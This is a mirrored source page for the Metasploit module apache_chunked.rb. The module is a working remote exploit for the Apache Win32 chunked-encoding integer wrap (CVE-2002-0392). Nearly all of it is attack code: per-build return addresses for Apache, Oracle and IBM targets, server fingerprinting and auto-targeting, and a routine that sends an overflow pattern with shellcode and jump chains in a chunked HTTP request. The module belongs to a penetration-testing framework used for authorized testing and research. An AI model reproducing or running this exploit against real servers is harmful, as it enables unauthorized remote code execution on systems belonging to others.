CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/apache_chunked.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78HttpFingerprint = { :pattern => [ /Apache/ ] }910include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(update_info(info,14'Name' => 'Apache Win32 Chunked Encoding',15'Description' => %q{16This module exploits the chunked transfer integer wrap17vulnerability in Apache version 1.2.x to 1.3.24. This18particular module has been tested with all versions of the19official Win32 build between 1.3.9 and 1.3.24. Additionally,20it should work against most co-branded and bundled versions21of Apache (Oracle 8i, 9i, IBM HTTPD, etc).2223You will need to use the Check() functionality to determine24the exact target version prior to launching the exploit. The25version of Apache bundled with Oracle 8.1.7 will not26automatically restart, so if you use the wrong target value,27the server will crash.28},29'Author' => [ 'hdm', 'jduck' ],30'References' =>31[32[ 'CVE', '2002-0392' ],33[ 'OSVDB', '838'],34[ 'BID', '5033' ]35],36'Privileged' => true,37'Platform' => 'win',38'Payload' =>39{40'Space' => 987,41'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",42'MinNops' => 200,43'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",4445},46'Targets' =>47[48[ 'Windows Generic Bruteforce', {} ],4950# Official Apache.org win32 builds51[ 'Apache.org Build 1.3.9->1.3.19',52{53'Ret' => 0x00401151,54'Pad' => [6,2,0,4,1,3,5,7]55}56],57[ 'Apache.org Build 1.3.22->1.3.24',58{59'Ret' => 0x00401141,60'Pad' => [2,6,0,4,1,3,5,7]61}62],63[ 'Apache.org Build 1.3.19->1.3.24',64{65'Ret' => 0x6ff6548d,66'Pad' => [2,6,0,4,1,3,5,7]67}68],69[ 'Apache.org Build 1.3.22',70{71'Ret' => 0x6ff762ac,72'Pad' => [2,6,0,4,1,3,5,7]73}74],7576# Return to Win9xConHook.dll via call ebx77[ 'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',78{79'Ret' => 0x1c0f13e5,80'Pad' => [2,6,0,4,1,3,5,7]81}82],8384# Return to Win9xConHook.dll via call esi85[ 'Apache.org Build 1.3.17->1.3.24 (Windows NT)',86{87'Ret' => 0x1c0f1033,88'Pad' => [2,6,0,4,1,3,5,7]89}90],9192# Interesting return to PEB trick for Windows 2003 systems...93[ 'Windows 2003 English SP0',94{95'Ret' => 0x7ffc0638,96'Pad' => [2,6,5,4,1,3,0,7]97}98],99100# Pop/Pop/Return on Windows 2000101[ 'Windows 2000 English',102{103'Ret' => 0x75022ac4,104'Pad' => [2,6,5,4,1,3,0,7]105}106],107108# Oracle HTTPD: [ 8.1.7 ] (one shot)109# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4110# OpenSSL/0.9.5a mod_perl/1.24111[ 'Oracle 8.1.7 Apache 1.3.12',112{113'Ret' => 0x1d84d42c,114'Pad' => [7]115}116],117118# Oracle HTTPD: [ 9.1.0 ] (multiple shots)119# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4120# OpenSSL/0.9.5a mod_perl/1.24121[ 'Oracle 9.1.0 Apache 1.3.12',122{123'Ret' => 0x10016061,124'Pad' => [5,6,0,4,1,3,2,7]125}126],127128# Oracle HTTPD: [ 9.2.0 ] (multiple shots)129# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)130# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b131# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25132[ 'Oracle 9.2.0 Apache 1.3.22',133{134'Ret' => 0x6ff6427a,135'Pad' => [5,6,0,4,1,3,2,7]136}137],138139# Generic debugging targets140[ 'Debugging Target',141{142'Ret' => 0xcafebabe,143'Pad' => [0,1,2,3,4,5,6,7]144}145]146],147'DisclosureDate' => '2002-06-19',148'DefaultTarget' => 0))149end150151def check152response = send_request_raw({'uri' => '/'}, 5)153if response.nil?154vprint_status("No response to request")155return Exploit::CheckCode::Unknown156end157158http_fingerprint({ :response => response }) # Custom Server header matching159160code = Exploit::CheckCode::Appears161162case response['Server']163when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"164vprint_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")165when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"166vprint_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")167when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"168vprint_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")169when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/170vprint_status("IBM backported the patch, this system is not vulnerable")171code = Exploit::CheckCode::Safe172when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/173else174code = Exploit::CheckCode::Safe175end176177vprint_status("Server: #{response['Server']}")178179return code180end181182def auto_target183response = send_request_raw({'uri' => '/'}, 5)184if response.nil?185print_error("No response to request")186return targets_to_try187end188189http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection190191targets_to_try = []192server_hdr = response['Server']193print_status("Server: #{server_hdr}")194195case server_hdr196when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"197targets_to_try.push(targets[9])198199when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"200targets_to_try.push(targets[10])201202when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"203targets_to_try.push(targets[11])204205when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/206# fall through207208else209# check for apache version ranges210if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)211version = $1212213#print_status("Apache version: #{version}")214ver = version.split('.')215if (ver.length == 3)216major = ver[0].to_i217minor = ver[1].to_i218rev = ver[2].to_i219if (major == 1 and minor == 3)220targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)221targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)222targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)223targets_to_try.push(targets[4]) if (rev == 22)224225# Add the remaining targets, regardless of quality...226if (server_hdr =~ /Win32/)227# targets 4, 5, 6, 7228if (rev >= 17 and rev <= 24)229targets_to_try.push(targets[5])230targets_to_try.push(targets[6])231end232targets_to_try.push(targets[7])233targets_to_try.push(targets[8])234end235end236# Version 1.0 - 1.2, Fall through...237end238# ServerTokens setting isn't giving up enough information ... Might need to try?239end240# Not Apache? Fall through...241end242243targets_to_try244end245246#247# If auto, ask the auto_target function for a list of248# targets to try...249#250# If not auto, just try the selected target.251#252def exploit253if target_index == 0254targs = auto_target255print_status("Auto-targeting returned #{targs.length} candidates...")256targs.each_with_index { |targ, idx|257# Never try the debug target automatically :)258next if targ.name =~ /Debug/259exploit_target(targ)260}261else262exploit_target(target)263end264end265266def exploit_target(target)267target['Pad'].each { |pad|268pattern =269rand_text_alphanumeric(3936) +270payload.encoded +271make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +272rand_text_alphanumeric(pad)273274# Move slightly further back to allow padding changes275pattern +=276"\xeb\xf0\xde\xad" +277[target.ret].pack('V')278279# Create a chain of return addresses and reverse jumps280254.times { |x|281pattern +=282"\xeb\xf6\xbe\xef" +283[target.ret].pack('V')284}285286# Even out the request length based on the padding value287# This is required to reliably hit the return address offset288pattern += rand_text_alphanumeric(8 - pad)289290#291# Regardless of what return we hit, execution jumps backwards to the shellcode:292# _______________ _______________ ___________293# _________ _____________ | ________ | | ______ | | ______294# v | v | v v | | v v | | v v |295# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]296#297298print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")299300# Build the request301send_request_raw({302'uri' => '/',303'headers' =>304{305'Transfer-Encoding' => "CHUNKED"306},307'data' => "FFFFFFF0 " + pattern,308}, 2)309310# Check the handler311handler312}313end314end315316317